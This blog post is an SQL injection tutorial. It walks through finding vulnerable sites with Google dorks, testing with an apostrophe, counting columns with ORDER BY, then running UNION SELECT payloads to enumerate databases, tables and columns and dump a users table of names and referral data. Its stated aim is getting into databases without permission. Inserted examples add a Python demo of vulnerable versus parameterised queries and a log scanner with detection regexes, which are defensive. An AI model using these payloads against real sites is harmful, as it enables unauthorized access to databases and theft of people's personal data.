OK guys, today I'm going to post the first article of this blog.
So I thought I'd give you a first lesson on SQL injection.
The vulnerability occurs when user input is either incorrectly filtered for string-literal escape characters embedded in SQL statements, or is not strongly typed, and is thereby unexpectedly executed as part of the query.
What we do here is use these SQL errors to bypass the security of a particular web site and get into its database without permission.
Step 1 is to find a website which is vulnerable to SQL injection. This is the most time-consuming part, so you have to be patient. OK now, let's see what kind of pages are vulnerable to this attack. We use Google to do this, with Google dorks: searches for pages whose URL takes an id-style parameter.
So OK, now how do you check if a webpage is vulnerable to this attack?
Once you run the dorks and get the search results, pick one of them. Say for example:
http://www.xyz.com/index.php?catid=1
Add a ' (apostrophe) at the end of the URL, so that the URL looks like:
http://www.xyz.com/index.php?catid=1'
If the page returns an SQL error, the page is vulnerable to SQLi, and that means you can continue your SQL injection on this website.
Typical error messages are:
Warning: mysql_num_rows():
Warning: mysql_result():
Warning: mysql_fetch_assoc():
Warning: mysql_numrows():
Step 2 - Suppose you have found a web site that is vulnerable to SQLi attacks. Follow the steps below.
First you need to enumerate the number of columns, and then find out which of those columns accept the queries from you.
To do so you use the order by statement. Remove the apostrophe from the previous URL and append an order by statement as follows:
ex - http://www.xyz.com/index.php?catid=1 order by 1
Keep increasing the number after order by until you get an error. The highest number for which you do not get an error is the number of columns in the table.
ex - Imagine http://www.xyz.com/index.php?catid=1 order by 5 gives you no error message, but http://www.xyz.com/index.php?catid=1 order by 6 gives you an error. If so, the total number of columns is 5.
Step 3 - Now to find out which column numbers accept the queries. To do so you use another statement called "union select".
Append a union select statement to the URL. Also precede the number after "catid=" with a hyphen or minus sign, so that no real row matches and the row from the union is what gets displayed.
Say from the above step you found that the table has 5 columns.
ex - http://www.xyz.com/index.php?catid=-1 union select 1,2,3,4,5
Imagine the result of this query shows the numbers 2, 3 and 4 on the page: those are the column numbers that accept the queries. Now we'll inject our SQL statements in one of these columns.
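As an added example (not the post's own code), here is a Python script that builds an in-memory SQLite stand-in for a page like the one above (a 5-column category table and a users table, all names assumed) and shows both sides: the query concatenated from the catid parameter, which is what makes the apostrophe check, the order by counting and the union select reflection from steps 1 to 3 work, and the hardened version that validates the type and binds the parameter, against which the same inputs do nothing.

```python
import sqlite3

# Constructed stand-in for the PHP/MySQL site in the post: an in-memory SQLite database
# with a 5-column category table (the post's "order by 5" case) and a users table.
SCHEMA = """
CREATE TABLE category (id INTEGER, catName TEXT, catDesc TEXT, parent INTEGER, status INTEGER);
INSERT INTO category VALUES (1, 'Books', 'All books', 0, 1);
CREATE TABLE users (id INTEGER, user_name TEXT, password TEXT);
INSERT INTO users VALUES (7, 'alice', 'hunter2');
"""

def connect():
    con = sqlite3.connect(":memory:")
    con.executescript(SCHEMA)
    return con

def lookup_vulnerable(con, catid):
    """Query built by string concatenation, like the mysql_* pages the post targets:
    whatever arrives in catid becomes part of the SQL text."""
    sql = "SELECT id, catName, catDesc, parent, status FROM category WHERE id=" + catid
    return con.execute(sql).fetchall()

def lookup_safe(con, catid):
    """Hardened form: enforce the numeric type, then bind the value as a parameter,
    so the same payloads never reach the SQL parser as code."""
    try:
        value = int(catid)
    except ValueError:
        return []
    sql = "SELECT id, catName, catDesc, parent, status FROM category WHERE id=?"
    return con.execute(sql, (value,)).fetchall()

def raises_sql_error(con, catid):
    """Step 1 check: does this input make the database throw (e.g. catid=1')?"""
    try:
        lookup_vulnerable(con, catid)
        return False
    except sqlite3.OperationalError:
        return True

def probe_column_count(con, max_cols=10):
    """Step 2: 'order by N' succeeds until N exceeds the number of selected columns."""
    count = 0
    for n in range(1, max_cols + 1):
        if raises_sql_error(con, f"1 order by {n}"):
            break
        count = n
    return count

if __name__ == "__main__":
    con = connect()
    print(probe_column_count(con))                              # 5
    print(lookup_vulnerable(con, "-1 union select 1,2,3,4,5"))  # [(1, 2, 3, 4, 5)]
    print(lookup_safe(con, "-1 union select 1,2,3,4,5"))        # []
```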
Step 4 - The next step is enumerating the SQL version.
We'll use the MySQL system variable @@version or the function version() to get the version of the database. We have to inject it in one of the open columns; imagine we use column number 2. So replace the 2 in "http://www.xyz.com/index.php?catid=-1 union select 1,2,3,4,5" with @@version (or version()). It will look like this:
http://www.xyz.com/index.php?catid=-1 union select 1,@@version,3,4,5
You'll get the version of the database in the place where you previously saw the number 2.
Step 5 - Exploitation
To get the list of databases, use "group_concat(schema_name)" as below:
http://www.xyz.com/index.php?catid=-1 union select 1,group_concat(schema_name),3,4,5 from information_schema.schemata--
The result will display the list of databases on the site. Result: information_schema,vrk_mlm
IMPORTANT - From here on we are going to write down the results we get on paper, so it's good to find a piece of paper and a pen.
Step 6 -
Now, to know the current database in use, use "concat(database())" as follows:
http://www.xyz.com/index.php?catid=-1 union select 1,concat(database()),3,4,5--
ex - Result: vrk_mlm
Step 7 -
To get the current user, use "concat(user())" as mentioned below:
http://www.xyz.com/index.php?catid=-1 union select 1,concat(user()),3,4,5--
Result: vrk_4mlm@localhost
Step 8 -
To get the tables, use "group_concat(table_name)" as mentioned below:
http://www.xyz.com/index.php?catid=-1 union select 1,group_concat(table_name),3,4,5 from information_schema.tables where table_schema=database()--
ex - Result: administrator,category,product,users
For this example we'll concentrate our attack on the "users" table.
Step 9 -
To get the columns, do as follows:
http://www.xyz.com/index.php?catid=-1 union select 1,group_concat(column_name),3,4,5 from information_schema.columns where table_schema=database()--
ex - Result: admin_id,user_name,password,user_type,status,catID,catName,prodId,catID,prodName,prodDesc,prodKeyword,prodPrice,prodImage,id,incredible_id,f_name,m_name,l_name,refered_by_id,refered_direct_to_ids,refered_to_ids,no_of_direct_referals,credits,position,email_id,password,edited_on,last_login,created_on,chain_number,phone,address
By looking at the columns closely, together with the order of the tables, we can see that the columns starting from id,incredible_id belong to the users table, and now we are going to target these columns.
LAST STEP
Extract information from the columns as follows.
Example only!! You have to fill in the column names discovered in the above step.
http://www.xyz.com/index.php?catid=-1 union select 1,group_concat(id,0x3a,incredible_id,0x3a,f_name,0x3a,m_name,0x3a,l_name,0x3a,refered_by_id,0x3a,refered_direct_to_ids,0x3a),3,4,5 from vrk_mlm.users--
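As an added example (not from the post), here is the defender's side of the whole procedure above: a small Python scanner that runs over constructed web-server access-log lines and flags the probes the steps rely on (the apostrophe on a numeric parameter, order by counting, union select, and information_schema / version enumeration). The log lines and rule names are made up for this example.

```python
import re
from urllib.parse import urlparse, parse_qsl

# Constructed access-log lines (not real traffic) replaying the probes from the post.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /index.php?catid=1 HTTP/1.1" 200 512
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /index.php?catid=1' HTTP/1.1" 200 340
10.0.0.5 - - [01/Jan/2024:10:00:02 +0000] "GET /index.php?catid=1%20order%20by%206 HTTP/1.1" 200 340
10.0.0.5 - - [01/Jan/2024:10:00:03 +0000] "GET /index.php?catid=-1%20union%20select%201,@@version,3,4,5 HTTP/1.1" 200 600
10.0.0.5 - - [01/Jan/2024:10:00:04 +0000] "GET /index.php?catid=-1%20union%20select%201,group_concat(table_name),3,4,5%20from%20information_schema.tables%20where%20table_schema=database()-- HTTP/1.1" 200 700
10.0.0.9 - - [01/Jan/2024:10:00:05 +0000] "GET /news.php?id=42 HTTP/1.1" 200 900
"""

# Common log format: client ip, then the quoted request line.
REQUEST_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) ')

# One rule per probe in the post, matched against the decoded parameter value.
RULES = [
    ("quote_in_numeric_param", re.compile(r"^\d+'$")),
    ("order_by_probe", re.compile(r"\border\s+by\s+\d+", re.I)),
    ("union_select", re.compile(r"\bunion\s+(all\s+)?select\b", re.I)),
    ("schema_enumeration", re.compile(r"information_schema|group_concat\(|@@version|version\(\)", re.I)),
]

def classify_value(value):
    """Names of the rules that fire on one query-string value (empty list if clean)."""
    return [name for name, pat in RULES if pat.search(value)]

def scan_log(text):
    """Returns (client_ip, path, parameter, rule names) for every flagged request."""
    hits = []
    for line in text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        ip, target = m.group(1), m.group(2)
        parsed = urlparse(target)
        # parse_qsl percent-decodes each value, so %20 becomes a space before matching.
        for key, value in parse_qsl(parsed.query, keep_blank_values=True):
            names = classify_value(value)
            if names:
                hits.append((ip, parsed.path, key, names))
    return hits

if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit)
```

The same four hits in a row from one client, in this order, are the fingerprint of the walkthrough above; the fix on the application side is the parameterised query, not the filter.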
I hope this tutorial is useful to you all, and yeah, in the future there is more to come! So stay tuned with us.
And if this post was useful to you, don't forget to share it and bookmark our blog. Thank you.
Happy Hacking.
useful post. hope that will help